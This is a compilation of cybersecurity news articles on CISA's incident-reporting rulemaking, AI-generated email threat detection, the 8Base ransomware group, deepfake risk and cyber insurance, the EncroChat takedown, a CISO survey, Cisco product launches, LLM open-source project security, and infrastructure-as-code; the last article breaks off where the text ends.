CISA received 131 comments in response to its RFI by the November 14, 2022, deadline. The agency also hosted 30 “listening sessions” with various industry groups from September 2022 through January 2023.

An examination of selected comments submitted to CISA reveals how challenging the task of creating an overarching cyber incident reporting framework will be. The commenters diverged on a host of the central questions posed by CISA, including how to define which entities should be covered, which kinds of cyber incidents should be reported, how soon incidents should be reported, how they should be reported, and how the sensitive reported information should be protected.

The commenters rarely completely agreed on how CISA should proceed, particularly regarding who should be obligated to report. Moreover, many of the commenters advocated narrowing the reporting requirements with exclusions or criteria that would eliminate many cybersecurity incidents. Finally, most commenters recommended aligning CISA’s reporting framework with those developed for specific sectors, which could make CISA’s ultimate framework unwieldy to implement.

The following summary highlights only some primary threads from the CISA’s NOI reply comments.

Which entities should be covered?

The commenters varied widely regarding which entities should be covered by the incident reporting rules. Several commenters stressed that CISA should apply size thresholds to weed out smaller entities. For example, the Independent Community Bankers Association said that for the Financial Services Sector, “covered entities” should only include banks with $50 billion or more in assets. The American Water Works Association, representing tens of thousands of primarily small water companies across the US, likewise advocates limiting reports based on size, suggesting a population threshold of customers served starting at 3,300.

Energy provider Exelon offered a more complex approach, saying that the definition of covered entity should be consistent with the definition of critical infrastructure provided in section 2240(5) of the Homeland Security Act and based on:

• Consequences that disruption to or compromise of the entity could cause to national security, economic security, or public health and safety
• The likelihood that such an entity may be targeted by a malicious cyber actor, including a foreign country
• The extent to which damage, disruption, or unauthorized access to such an entity, including the accessing of sensitive cybersecurity vulnerability information or penetration testing tools or techniques, will likely enable the disruption of the reliable operation of critical infrastructure

Several commenters recommended a risk-based approach in determining what constitutes a covered entity. NCTA – The Internet & Television Association said that consistent with previous policy-based approaches, the “types of entities that constitute covered entities” should be based on risk-based criteria. These criteria include “the consequences that disruption to or compromise of such an entity could cause to national security, economic security, or public health and safety,” “the likelihood that a malicious cyber actor may target such an entity, and “the extent to which damage, disruption, or unauthorized access to such an entity . . . will likely enable the disruption of the reliable operation of critical infrastructure.”

On the other hand, Microsoft was among the commenters who advocated a more encompassing approach to defining covered entities, saying a risk-based approach is too difficult to implement. The software giant told CISA that “the definition should incorporate existing federal critical infrastructure regulation. The term covered entity should include any entity designated as critical infrastructure by other federal law or authority, including an executive order or presidential policy directive, or is otherwise subject to federal law or regulation as a critical infrastructure operator.

Advocating narrow definitions

To limit the burdens organizations would face if they had to report every minor mishap, many commenters advocated narrow definitions of which incidents to report. NTCA – The Rural Broadband Association argued that covered cyber incidents should include only confirmed incidents that significantly disrupt a provider’s ability to operate core functions and exclude attempts that seek to disrupt them if they don’t rise to that level.

The Municipal Information Systems Association of California (MISAC) said that the definition of a covered incident should be as specific as possible, identifying the criticality or scope of the incident that requires reporting and excluding “external cyber events, natural or man-made, that targets critical infrastructure services including but not limited to DDoS, phishing attempts, provider issues, or natural disaster with no successful infiltration into the agency network, systems, or data.”

Cloudflare argued that any definition of a covered incident should be narrow and specific and encompass only incidents that involve a loss of data, a loss of personally identifiable information (PII), a loss of trade secrets, a financial loss due to degradation, or a substantial disruption of a covered entity’s services.

72-hour cyber incident window with caveats

Although CIRCIA stipulates a 72-hour reporting period, many commenters view that time frame as infeasible. HIMSS Electronic Health Record Association, for example, said that CISA should “provide flexibility for Covered Entities to only include information they have been able to verify in the initial 72-hour report. Requiring all of the elements identified in CIRCIA at 72 hours will not be feasible and would contribute to delays in reporting and divert resources from efforts of the Covered Entity to recover and resume normal operations.”

Like other commenters, NTCA – The Rural Broadband Association argued that the 72-hour window should be considered a minimum time frame. “Cyber incident reports also should not be required until a minimum of 72 hours after a covered entity has confirmed a cyberattack disrupting the provider’s core, transport, and/or access networks has occurred. Covered entities need time to investigate and mitigate an intrusion before reporting to the government. This will also result in more effective incident reports as the reporting entities will have a clearer picture of the incident, making CISA better aware of the tactics used to carry out the cyber-attack, NTCA said.

NTCA’s counterpart, NCTA, suggests that the 72-hour clock should not start until the confirmation and containment of an incident as a “substantial incident.” The National Association of Manufacturers suggests that the 72-hour clock should start once a covered entity “reasonably believes” an incident occurs because “the days following discovery of a major cybersecurity incident are often characterized by inconclusive data and mixed presentations of information that require an all-hands-on-deck effort within an enterprise to investigate and respond to the threat.”

Harmonize cyber incident reporting requirements to reduce burdens

The one area of consensus among most of the commenters is that CISA should take great care to align their reporting requirements with those from other regulatory bodies, some of which, such as those from the Federal Communications Commission (FCC) and the Securities and Exchange Commission (SEC), are still evolving. Most also point to potential overlap with other governments’ reporting requirements, including the European Union’s General Data Privacy Regulation (GDPR) and state-level breach reporting requirements.

The National Association of Manufacturers acknowledges the 72-hour reporting deadline is consistent with the GDPR data breach standard, adding that “Any labor-intensive reporting requirements would divert a company’s internal resources from responding to an attack and add unnecessary layer to an already complex situation.”

Several commenters in the power sector point to the already extensive reporting requirements applied to electricity providers, including regimes overseen by the Department of Energy (DOE) and the Federal Energy Regulatory Commission (FERC). The American Public Power Association (APPA), and the Large Public Power Council (LPPC) said, for example, “Given the existing incident reporting regimes overseen by FERC and DOE, CISA should engage in direct and deep consultation with FERC and DOE as it works to implement CIRCIA. Moreover, CISA must take into account existing data breach reporting requirements at the state level. To improve the threat landscape and associated awareness of it, it will be critical to work with existing infrastructures wherever possible to allow single-point reporting with the government being responsible for sharing information internally in a need-to-know environment, rather than imposing multiple reporting obligations on an impacted entity, which may also be dealing with a live cybersecurity event.”

Flexibility and confidentiality for cyber incident report submissions

In terms of how covered incidents should submit reports to CISA, the commenters touched on a range of topics, including whether organizations can report through third parties such as information sharing and analysis centers (ISACs), how they receive report submission confirmations, and the degree to which CISA will keep any reports confidential.

The North American Electric Reliability Corporation advised CISA to require covered entities to clearly identify that they are reporting an incident under CIRCIA, as opposed to a voluntary share, and develop an automated mechanism to confirm receipt of a CIRCIA report from a covered entity or a third party on behalf of a covered entity.

The National Rural Electric Cooperative Association said that CISA should be flexible in how reports are submitted, including machine-to-machine and other reporting methods, and asks CISA to use the current structure of the electricity subsector regarding content and submission procedure.

Some commenters expressed concerns over how CISA could keep the reports confidential. NCTA, for example, said, “Much of the information reported to CISA under CIRCIA will be highly confidential and competitively sensitive. To protect such information, CISA should consider treating incident reports as covered either by DHS’s PCII Program or an equivalent program. The PCII Program establishes uniform procedures for the receipt, care, and storage of critical infrastructure information submitted to DHS to protect sensitive data against disclosure through FOIA requests, state and local disclosure laws, use in regulatory proceedings, and use in civil actions.”

Threat prevention company Perception Point has unveiled a new detection model to counter generative AI-based email threats. The AI-powered technology leverages large language models (LLMs) and deep learning architecture to detect and prevent business email compromise (BEC) attacks, currently undergoing a significant shift due to the rise of generative AI technologies, the vendor said. The method harnesses transformers, AI models capable of understanding the semantic context of text, mirroring the technology behind popular LLMs like OpenAI's ChatGPT and Google's Bard, according to Perception Point.

Malicious actors can use generative AI to enhance their attack toolsets, with email-based social engineering no exception. In January, a study from WithSecure demonstrated how attackers can use generative AI platform ChatGPT to significantly enhance phishing/BEC scams and launch more effective, harder-to-detect campaigns.

Researchers showed that not only can attackers generate unique variations of the same phishing lure with grammatically correct and human-like written text, but they can build entire email chains to make their emails more convincing and can even generate messages using the writing style of real people based on provided samples of their communications. Meanwhile, the Verizon 2023 Data Breach Investigations Report revealed that BEC attacks have almost doubled this year, now accounting for over 50% of incidents involving social engineering.

Method identifies unique patterns in LLM-generated text to detect email threats

The new approach allows Perception Point's solution to identify the unique patterns in LLM-generated text, a key factor in detecting and thwarting generation AI-based threats, the firm said in a press release. The model processes incoming emails at an average of 0.06 seconds, aligning with Perception Point's ability to scan content in near real-time, it added. It has initially been trained on hundreds of thousands of malicious samples caught by Perception Point and is continuously updated with new data to maximize its effectiveness, the vendor claimed.

"There is an urgent need for cutting-edge defenses against generative AI-powered threats," said Tal Zamir, CTO of Perception Point. "We're being challenged as an industry with yet another avenue that bad actors have come to exploit in their ever-expanding range of attacks."

Approach keeps false positives to a minimum via three-phase architecture

The method has also been designed with false positives in mind, Perception point noted. To minimize the detection of false positives that result from the widespread use of generative AI for crafting legitimate emails, the new method uses a three-phase architecture.

In the first phase, the model assigns a score representing the probability of the content being AI-generated, Perception Point wrote in a blog. Following this, it categorizes the content using advanced Transformers and a refined clustering algorithm. Categories include BEC, spam, and phishing, with a probability score assigned for each. In the final phase, the model integrates insights from the previous steps with additional numeric data, like the sender reputation and authentication protocols information (SPF, DKIM, DMARC). Based on these factors, it predicts if the content is AI-generated, and whether it's malicious, spam, or clean.

A massive spike in ransomware activity in May and June 2023 has been attributed to a relatively unknown ransomware group called 8Base. 

"Although the 8Base Ransom Group is not necessarily a new group, their spike in activity recently has not gone unnoticed. Even within the past 30 days, it is within the top 2 performing ransom groups," VMware said in a report. "Not much was known publicly about the kind of ransomware used by 8Base other than the ransom note and that it appends encrypted files with the extension '.8base'."

The group utilizes encryption paired with "name-and-shame" techniques to compel its victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries, VMware said. 

8Base is a Ransomware group that has been active since March 2022. The group describes itself as "simple pen testers." Their leak site provides victim details through Frequently Asked Questions and Rules sections as well as multiple ways to contact the group.

The group has been linked to 67 attacks as of May 2023, with about half of the victims operating in the business services, manufacturing, and construction sectors. A majority of the targeted companies are located in the US and Brazil, according to statistics gathered by Malwarebytes and NCC Group. 

Similarities with RansomHouse

While reviewing 8Base, the researchers noticed there were significant similarities between the 8Base group and another group called RansomHouse. 

"It is up for debate whether RansomHouse is a real ransomware group or not; the group buys already leaked data, partners with data leak sites, and then extorts companies for money," VMware said in its report. 

Comparing the ransom notes between the two groups the researchers found a 99% match in linguistics. The language of both the groups' leak sites was also identical. 

"The verbiage is copied word for word from RansomHouse's welcome page to 8Base's welcome page," VMware said.  

The only two major difference between the groups was that RansomHouse advertises its partnerships and is openly recruiting for partnerships, whereas 8Base does not. 

"Given the similarity between the two, we were presented with the question of whether 8Base may be an off-shoot of RansomHouse or a copycat," VMware said, adding that RansomHouse is known for using a wide variety of ransomware that is available on dark markets and doesn't have its own signature ransomware as a basis for comparison. "Interestingly, while researching 8Base we weren't able to find a single ransomware variant either," VMware said. 

Similarities with Phobos Ransomware

While searching for a sample of ransomware used by 8Base Ransom Group, researchers recovered Phobos sample using a ".8base" file extension on encrypted files. "A comparison of Phobos and the 8Base sample revealed that 8Base was using Phobos version 2.9.1 loaded with SmokeLoader," VMware said. 

Phobos ransomware is available as a ransomware-as-a-service. Other threat actors can customize parts to their needs as seen in the 8Base ransom note. 

"Although their ransom notes were similar, key differences included Jabber instructions and 'Phobos' in the top and bottom corners of the Phobos ransomware while 8Base has 'cartilage' in the top corner, a purple background, and no Jabber instructions," VMware said. 

VMware warns that 8Base is a highly active group and targets small businesses. "Given the nature of the beast that is 8Base, we can only speculate at this time that they are using several different types of ransomware -- either as earlier variants or as part of their normal operating procedures. What we do know is that this group is highly active and targets smaller businesses," VMware said. 

With the explosion of generative AI programs such as ChatGPT, DALL-E, and Bing, it's becoming easier to create convincing deepfakes that sound, look, move, and express realistically enough to fool business users and customers into falling for new forms of trickery. And the types of deepfakes we're seeing today, such as the fake of Russian President Vladimir Putin declaring martial law over trusted television and radio stations, are only the beginning.

Deepfakes can ruin a company's reputation, bypass biometric controls, phish unsuspecting users into clicking malicious links, and convince financial agents to transfer money to offshore accounts. Attacks leveraging deepfakes can happen over many channels from social media to fake person-to-person video calls over Zoom. Voicemail, Slack channels, email, mobile messaging, and metaverses are all fair game for distributing deepfake scams to businesses and personal users.

Cyber liability insurers are beginning to take notice, and as they do, their security requirements are beginning to adjust to the new 'fake' reality. This includes, but is not limited to, better hygiene across the enterprise, renewed focus on home worker systems, enforced multifactor authentication, out-of-band confirmation to avoid falling for deepfake phishing attempts, user and partner education, and third-party context-based verification services or tools.

Even the diligent can be deepfake-fooled

In early June, two instances of voicemail impersonation were reported to Rob Ferrini, cyber insurance program manager at McGowanPRO, headquartered in Framingham, Massachusetts, with 5,000 cyber-insured clients covered by its insurance partners. 

One led to an open claim under investigation, in which the insured was an accounting firm and an accountant there received a voicemail from one of his business customers to change the instructions for a vendor and make payment on a $77,000 invoice. "The accountant then called their client to verify, and his client reported that he got the same voicemail from their vendor account, so it's probably OK. It ended up that the accountant's client paid a $77,000 invoice to a fraudulent bank account," Ferrini says.

While the accountant did his due diligence and called his client, the client did not do their diligence and call their vendor for confirmation that the voicemail was real. If the insurance investigators cannot claw the money back, the accountant's client may not get reimbursed. Inversely, in that same week, a wealth manager contacted Ferrini to tell him how out-of-band authentication (OOBA) protected his client from falling for an impersonator trying to get him to open a fake mortgage. Before giving away any information to the scammer, the client simply called to ask the wealth manager if that was true, and he told him it was fake.

Other layers need to adapt to the deepfake threat

"Many cyber insurance carriers require out-of-band authentication controls to underwrite policies. Out-of-band authentication would mean you call them directly, making sure with two different methods that this person is who they say they are before wiring money to a new account," says Ryan Bell, threat intelligence manager at Corvus, a cyber insurance company based in Boston.

On its security tips page, Corvus provides education on OOBA along with employee awareness, multifactor authentication, email security and logging -- all of which can be applied to deepfake prevention and education. For example, the same prevention recommendations on wire-transfer fraud should apply to social engineering through deepfakes, but preventing deepfake-initiated scams from succeeding may need to be explicitly stated in the insurance policies.

The other issue is how to protect the voice, likeness, interests, and expressions of CEOs and other executives who can be scooped and input into the generative AI program to create the deepfakes, Bell says. Since it's impossible to keep these people off the web, then organizations will need to tune their dark web and external threat intelligence to look for precursors to deepfake creation.

Will insurers require new deepfake detection tools or services?

Employee awareness training will only go so far as deepfakes get more realistic and interactive with AI-generated images, trained facial expressions, and manipulated voices. Take, for example, work-from-home deepfake interviewees, which the FBI's Internet Crime Complaint Center (IC3) started warning about in 2022. At some point, it becomes impossible for the HR person to identify the fake, so deepfake detection and verification tools will become an important tool in the employer's arsenal.  

"There are programs that can detect if a person is live or fake by way of blood flow, movements, background, and more criteria, taking a recorded or live image down to the pixel level. These services look for signs of fakes that are largely undetectable at the human level," says Geoff Kohl, a senior director at the Security Industry Association (SIA) who authored a paper on the impact of deepfakes on cybersecurity programs that includes interviews with SIA members. "Today's emerging deepfake detection solutions are largely delivered as standalone software, but for these offerings to scale and become available to businesses everywhere, it is inevitable that these software solutions will be offered as cloud-based services."

Work is underway on open-source standards to assist viewers and security tools in verifying the authenticity of an image. Microsoft's Video Authenticator was built and tested on data sets prior to its release in 2020, and Microsoft concedes that the model will not hold up to advances in generative AI. And, since 2021, policy groups have been talking about contextualization engines to determine the realness of online media including images and voice, and companies like Google are announcing new tools to detect fakes in image search results. A handful of API and browser-based plugins are also emerging to detect the 'aliveness' of videos in social media.

And while these tools may serve media companies and social media users, they seem to neglect the key channels where deepfakes can impact business, government, and critical infrastructure agencies, such as over voicemail, e-mail, Zoom, Slack, or other common business communication channels. Based on their lack of readiness for generative AI at the April 2023 RSA Security Conference, don't expect traditional security vendors to fill this space any time soon. So, a new breed of cloud-based detection and inspection services will likely emerge to serve enterprises in the future.

What's in your policy about deepfakes?

For the most part, organizations will need to focus on requirements that are in their cyber insurance policies. Since most policies call for multifactor authentication as a prerequisite for granting coverage, Ferrini of McGowanPRO suggests that business users need to strengthen these capabilities across their organizations. So, if deepfakes are used to thwart biometric access controls, a second form of authentication would help protect against unauthorized access.

Wendy Esposito, the lead of the GenAI Commission at Benesch Law, an AmLaw 200 firm with offices in the US and China, advises CISOs to review their cyber liability policies regularly, even quarterly or semi-annually if possible. "Organizations should be looking at their policies now to understand what is and is not covered, because technology and cyber threats are changing so quickly. CISOs should pick up that document regularly and hold discussions with risk, legal, and finance teams to measure current and future risks against potential gaps in coverage. At least annually, boards of directors need to be briefed on the organization's cyber liability coverage and any identified gaps."

Take reputational damage coverage, for example. If financial losses are caused through deepfakes posted on social media, podcasts, YouTube, or network television or radio (such as in the case with Russia's president), then current policies likely won't cover them because they weren't caused by a breach of the company's network or systems, she adds.

Esposito has seen many policies on behalf of her clients, and they only cover such losses if they were caused by network penetration or a cyberattack. Inversely, if the attackers use deepfakes to phish an employee and then install ransomware on company systems, then under certain policies that would probably be covered because it involves an intrusion -- so long as the proper email security controls and user training programs are actively in place (and those programs will need to be deepfake aware). It’s through this lens that CISOs and insurers will need to reexamine existing policy requirements and their technical controls. Esposito predicts that deepfake-related losses will be added onto cyber insurance policies, but for additional costs to the insured, adding that "cyber liability insurance is very expensive and deepfake coverage will likely add to that expense."

In one of the biggest law enforcement operations against encrypted communications, authorities around the world have arrested 6,558 people and seized $985 million (EUR900 million) in illicit proceeds in the takedown of encrypted phone network EncroChat.

A joint investigation -- initiated by French and Dutch authorities -- intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform among more than 60,000 users, Europol announced on Tuesday.

"The successful takedown of EncroChat followed the efforts of a joint investigation team (JIT) set up by both countries in 2020, supported by Eurojust and Europol. Since then, close to EUR 900 million in criminal funds have been seized or frozen," Europol said in a press release. Eurojust is an EU agency that coordinates law enforcement actions among member states.

Based on accumulated figures from all authorities involved, three years after EncroChat’s encryption was broken by law enforcement, 6,558 individuals have been arrested, including 197 high-value targets. Seizures also include 30.5 million pills of chemical drugs, 103.5 tons of cocaine, 163.4 tons of cannabis, 971 vehicles, 271 estates or homes, 923 weapons, and 40 airplanes.

Takedown of EncroChat

EncroChat was an encrypted messaging platform that was increasingly being used by organized crime groups. The French Gendarmerie and judicial authorities have been investigating phones that used the secured communication tool since 2017. The authorities discovered that the phones were regularly found in operations against organized crime groups and that the company was operating from servers in France.

"Eventually, it was possible to put a technical device in place to go beyond the encryption technique and have access to the users' correspondence," Europol and Eurojust said in a joint statement.

In early 2020, EncroChat was one of the largest providers of encrypted digital communications, with a very high share of users presumably engaged in criminal activity, the authorities said. "User hotspots were particularly present in source and destination countries for cocaine and cannabis trade, as well as in money laundering centers," according to the joint statement.

The French authorities decided to open a case with Eurojust in the Netherlands in 2019. Data related to the case was first shared with the Netherlands.

In France, where the operation took place under the code name "Emma 95," the Gendarmerie set up a task force in March 2020 with more than 60 officers. In the Netherlands, the operation went under the code name "Lemont," and hundreds of investigators -- with authorization of the examining magistrate -- constantly followed the communications of thousands of individuals in order to analyze and act on the intercepted data stream.

The interception of EncroChat messages came to an end on June 13, 2020, when the company realized that a public authority had penetrated the platform. "EncroChat then sent a warning to all its users with the advice to immediately throw away the phones," Europol said.

EncroChat operations

EncroChat phones were advertised as guaranteeing perfect anonymity, with no traceability to users. "It also had functions intended to ensure the automatic deletion of messages and a specific PIN code to delete all data on the device. This would allow users to quickly erase compromising messages, for example at the time of arrest by the police," Europol said.

In addition, the devices could be erased remotely by the reseller or a help desk. "EncroChat also sold crypto for around $1,100 (EUR 1,000) each, on an international scale. It also offered subscriptions with worldwide coverage, at a cost of $1,640 (1,500 EUR) for a six-month period, with 24/7 support," Europol said.

The use of encrypted communications by organized crime groups has been on the radar of law enforcement authorities around the world. In March 2021, SkyECC, another encrypted communication platform, was dismantled in a joint operation by judicial and law enforcement authorities in Belgium, France, and the Netherlands. Many users of EncroChat, once the operation was dismantled, changed over to the Sky ECC platform.

In the same year, the US Federal Bureau of Investigation (FBI) and Australian Federal Police (AFP) ran an encrypted chat service called ANoM for nearly three years to intercept 27 million messages exchanged between criminal gang members globally. As a result of that operation, 800 arrests were made across 118 countries. Europol called it the "biggest ever law enforcement operation against encrypted communication."

Ninety-three percent of organizations suffered a cyberattack last year, making attack surface visibility a top priority for CISOs, according to a study by threat intelligence company Censys.

The study was designed to explore the state of security leadership in a shifting digital terrain and interviewed a total of 208 CISOs or CISO equivalents from US-based companies with more than 5,000 employees.

In the report, Censys explored the cybersecurity events and experiences that influence senior leadership decisions, said Dayna Rothman, chief marketing officer at Censys. "By doing this study, it is our hope that organizations can better facilitate conversations about the importance of digital asset management and maintain good security practices that provide continued visibility," Rothman said.

Incidents fuel the push for attack surface visibility

All participants in the study agreed that their view of the current risk environment is more negative than it was a year ago. This was mainly because a significant number (93%) of them experienced at least one cyberattack in the past year, according to the study.

"Nearly three-fourths of those surveyed in recent EMA research had experienced a cybersecurity incident in the past 12-18 months," said Chris Steffen, an analyst at Enterprise Management Associates. "That number will always vary depending on what they consider an incident, but no matter how you look at it, the enterprise is forced to address these kinds of issues, either from a proactive prevention perspective or a remediation -- 'dealing with the consequences' perspective."

While the latest tools and technologies help CISOs cope with daily cybersecurity vulnerabilities, these advances in technology are also benefiting cybercriminals, Steffen added.

More than half (53%) of the respondents identified the "need to secure their organization's entire attack surface" as their top priority, emphasizing external attack surface management solutions as critical elements to securing organizations and preventing attacks.

"A significant part of the lack of visibility is the capabilities of the tools that the organization is using, but another significant portion is either a lack of understanding or a misconfiguration of the organization's attack surface," Steffen added. "Constantly changing enterprise environments -- from new technologies to updates, new vendors, and third-party connections -- also sometimes contribute to the attack surface."

Additionally, the report found 65% of security teams lacked qualified resources, leading to significant burnout among senior leaders and their team members.

Preferred measures include zero trust, cyberinsurance

Fifty-eight percent of respondents took defensive actions in the form of shifting to (or increasing) zero trust in the last year. According to the report, this was caused by a mix of factors, including increased global tensions and leading nation-state actors, globally distributed devices, and the White House's new cybersecurity strategy.

A significant number (91%) of the respondents said their organization has cyberinsurance in place, however, over a quarter (27%) do not understand the total obligations of their insurance policy.

This is because the insurance market itself is in flux, with changing standards, claim processes, and policy assessment types, according to Steffen. "According to a recent EMA survey, 75% of ransomware payees reported that paying the ransom resolved all the expected problems, while another 22% and 53% considered paying the ransom as cost and downtime saving respectively."

The study recommended that CISOs and cybersecurity professionals have clearer conversations with security teams about business operations to identify key threats and protect assets effectively.

A tremendous number of enterprises and service providers view Cisco as the nexus of their network, security, and cloud operations. At the company's Cisco Live customer and partner conference in June, Cisco boldly connected the dots of a network- and cloud-based ecosystem that ties together innovative technologies to drive productivity, resiliency, and growths, while also showcasing its artificial intelligence (AI) capabilities.

Cisco's market share for ethernet switches was 43.3% for 2022, according to IDC's tracker report, while combined service provider and enterprise router revenue accounted for 35.1% of the total market. Network World named Cisco #1 in its 2022 list of "the top 10 vendors providing corporate networks with everything from SASE and NaaS to ZTNA and network automation."

Cisco believes it's best positioned to help customers seamlessly manage networking domains, provide secure frictionless cloud access, and provide observability into the full stack of network and applications to quickly diagnose and remediate performance problems.

At Cisco Live, the company backed that up with a bold set of launches, including:

• Cisco Networking Cloud. A strategic vision to deliver a single, integrated management platform experience for both on-prem and cloud operating models, to help customers manage all Cisco networking products from one place.

• Cisco Secure Access. A security service edge (SSE) solution for its Cisco Security Cloud platform designed to simplify security experiences in today’s hybrid world for frictionless cloud access across any location, any device, and any application.
• Full Stack Observability (FSO). Cisco's FSO Platform is designed as a unified, extensible platform that is focused on OpenTelemetry. This vendor-agnostic solution empowers customers and partners to seamlessly bring together Metrics, Events, Logs, and Traces (MELT) data from multiple domains to enable new use cases, while elevating and securing digital experiences.
• Generative AI to empower security and productivity. Cisco announced it is harnessing large language models (LLMs) across its Security and Collaboration portfolios to help organizations drive productivity and simplicity for their workforce.
  • The Cisco Security Cloud leverages a generative AI assistant that addresses two use cases. This includes an SOC Assistant to dramatically increase the threat response speed and effectiveness of the Security Operations Center (SOC). Cisco's Policy Assistant simplifies policy management and enables Security and IT administrators to describe granular security policies and evaluate how to best implement them across different aspects of their security infrastructure.
  • Additionally, with new summarization capabilities in Webex, users can give prompts and ask questions, and automatically summarize meetings and contact center chats. This will drive real value by helping people collaborate better and increase productivity at work.
• Supercharging an 'unrivaled portfolio.' The new capabilities announced at Cisco Live are designed to help teams leverage end-to-end security monitoring, analysis, and remediation. This is what organizations need to build, deploy, and run secure cloud-native applications in today's distributed, multi-cloud environments. The new product line "supercharges its unrivaled portfolio that solves customer cloud application security challenges of today and the future," the company says.

That can't come soon enough for the IT and network teams crying out for simpler ways to manage their resources. "As Cisco's customers add billions of new connections to their enterprises and as more applications move to a multi-cloud environment, the network becomes even more critical," The Strategy Story observed in early 2023.

Researchers from software supply chain security firm Rezilion have investigated the security posture of the 50 most popular generative AI projects on GitHub. They found that the more popular and newer a generative AI open-source project is, the less mature its security is. Rezilion used the Open Source Security Foundation (OpenSSF) Scorecard to evaluate the large language model (LLM) open-source ecosystem, highlighting significant gaps in security best practices and potential risks in many LLM-based projects. The findings are published in the Expl[AI]ning the Risk report, authored by researchers Yotam Perkal and Katya Donchenko.

The emergence and popularity of generative AI technology based on LLMs has been explosive, with machines now possessing the ability to generate human-like text, images, and even code. The number of open-source projects integrating these technologies has grown significantly. For example, there are currently more than 30,000 open-source projects on GitHub using the GPT-3.5 family of LLMs, despite OpenAI only debuting ChatGPT seven months ago.

Despite their demand, generative AI/LLM technologies introduce security issues ranging from the risks of sharing sensitive business information with advanced self-learning algorithms to malicious actors using them to significantly enhance attacks. Earlier this month, the Open Worldwide Application Security Project (OWASP) published the top 10 most critical vulnerabilities often seen in LLM applications, highlighting their potential impact, ease of exploitation, and prevalence. Examples of vulnerabilities included prompt injections, data leakage, inadequate sandboxing, and unauthorized code execution.

What is the OpenSSF Scorecard?

The OpenSSF Scorecard is a tool created by the OpenSSF to assess the security of open-source projects and help improve them. The metrics it bases the assessment on are different facts about the repository such as the number of vulnerabilities it has, how often it's maintained, and if it contains binary files. By running Scorecard on a project, different parts of its software supply chain will be checked, including the source code, build dependencies, testing, and project maintenance.

The purpose of the checks is to ensure adherence to security best practices and industry standards. Each check has a risk level associated with it, representing the estimated risk associated with not adhering to a specific best practice. Individual check scores are then compiled into a single aggregate score to gauge the overall security posture of a project.

Currently, there are 18 checks that can be divided into three themes: holistic security practices, source code risk assessment, and build process risk assessment. The Scorecard assigns an ordinal scale between 0 to 10 and a risk level score for each check. A project with a score nearing 10 indicates a highly secure and well-maintained posture, whereas a score approaching 0 represents a weak security posture with inadequate maintenance and increased vulnerability to open-source risks.

Most popular open-source generative AI projects the least secure

Rezilion's research revealed a troubling trend: The more popular a generative AI/LLM project is (based on GitHub's star popularity rating system), the lower its security score (based on the OpenSSF Scorecard). "This highlights the fact that the popularity of a project alone is not a reflection of its quality, let alone its security posture," the researchers wrote. The most popular GPT-based project on GitHub, Auto-GPT, which has over 138,000 stars and is less than three months old, has a Scorecard score of just 3.7, according to the report. The average score among the 50 projects checked isn't much better at 4.6 out of 10.

For wider context, the researchers compared the risk of the most-popular generative AI and LLM projects on GitHub with other popular open-source projects on the platform that are not generative AI- or LLM-related. They analyzed a group of 94 critical projects (defined by the OpenSSF Securing Critical Projects Work Group) with an average Scorecard score of 6.18, along with a group of seven projects that use the OpenSSF Scorecard as part of their SDLC workflow, with an average score of 7.37.

"The maturity and security posture of the open-source ecosystem surrounding LLMs leave a lot to be desired," the researchers wrote. "In fact, as these systems gain more popularity and adoption, and as long the security standards in which they are developed and maintained remain the same, it seems inevitable that they will become the target of attackers, and significant vulnerabilities affecting them will continue to surface."

Generative AI, LLMs risks will increase over next 12-18 months

The risks posed to organizations by generative AI/LLMs are expected to evolve over the next 12 to 18 months as the popularity and adoption of these systems continue to grow, said Yotam Perkal, director of vulnerability research at Rezilion. "Without significant improvements in the security standards and practices surrounding LLMs, the likelihood of targeted attacks and the discovery of vulnerabilities in these systems will increase. Organizations must stay vigilant and prioritize security measures to mitigate evolving risks and ensure the responsible and secure use of LLM technology."

Organizations can prepare for LLM risks by adopting a secure-by-design approach when developing generative AI-based systems. They should also leverage existing frameworks like the Secure AI Framework (SAIF), NeMo Guardrails, or MITRE ATLAS to incorporate security measures into their AI systems, Perkal added. "It is also imperative to monitor and log LLM interactions and regularly audit and review the LLM's responses to detect potential security and privacy issues and update and fine-tune the LLM accordingly. Responsibility for preparing and mitigating LLM risks lies with both the organizations integrating the technology and the developers involved in building and maintaining these systems."

As more and more companies move to digitize their operations, cloud adoption is growing in kind. According to one Microsoft survey, 86% of businesses plan to increase their investment in hybrid or multi-cloud technology and 95% believe it is critical to their business success.

Yet, cloud technology is not without its challenges. The same advantages that make cloud technology an invaluable resource for scalability, agility, and collaboration can also make it a security liability.

When dealing with multiple cloud platforms or a blend of on-premise and cloud technology, it can be difficult to create a centralized view of your entire network or contextualize security alerts to understand their impact on the organization as a whole. There's also the risk of misconfigured cloud infrastructure entitlement, which can lead to overprivileged access to infrastructure and heighten your risk for exploitation and infiltration.

Organizations need a reliable way to secure their hybrid and multi-cloud environments. That's where infrastructure-as-code (IaC) comes in. When infrastructure automation companies like HashiCorp and cloud providers like Microsoft work in tandem, they can leverage best practices in cloud security and IaC to deliver a more secure infrastructure for their customers. Read on to learn how.

What are the benefits of infrastructure as code?

The global IaC market is growing rapidly, jumping from a $800 million valuation in 2022 to a projected $2.3 billion in 2027. Much of this growth is due to the inherent benefits of IaC.

Namely, its promise around automation, scalability, and repeatability.

Essentially, because IaC enables organizations to manage and provision infrastructure through code rather than manual processes, organizations can more easily scale their operations to meet current business needs. Once you create your first workload using IaC, you can then reuse that same code to build subsequent pieces of infrastructure--reducing the load on development teams and enabling improved code sharing.

"Using pre-approved patterns or code widely across the enterprise enables companies to essentially self-service their workloads. This empowers users and business teams alike. When you introduce infrastructure as code to the organization via the right automation, this makes it much simpler for them and allows for tangible benefits that make the organization run faster." - Arnaud Lheureux, Lead Architect of Strategic Partnerships at Microsoft

Organizations can also use IaC to codify and document configuration specifications and changes. This is especially critical when dealing with complex hybrid or multi-cloud environments because it provides clear visibility into where exactly a piece of code was integrated.

In the event of a security patch or code error, developers can quickly update the system where needed and test any changes within a pre-defined framework before launching the update. This visibility and documentation is also helpful for companies that operate in highly-regulated spaces and need to remain compliant with certain industry standards.

How infrastructure as code drives increased cloud security

A key element of IaC is its repeatability. And while we've discussed the workload and scalability benefits, it also has significant implications for security. This is because development teams can rigorously validate and test their code against a pre-defined security framework like NIST or a Cloud Adoption Framework before ever deploying it in their cloud environment. This helps create a high level of confidence that the code will not introduce new security vulnerabilities into their environment.

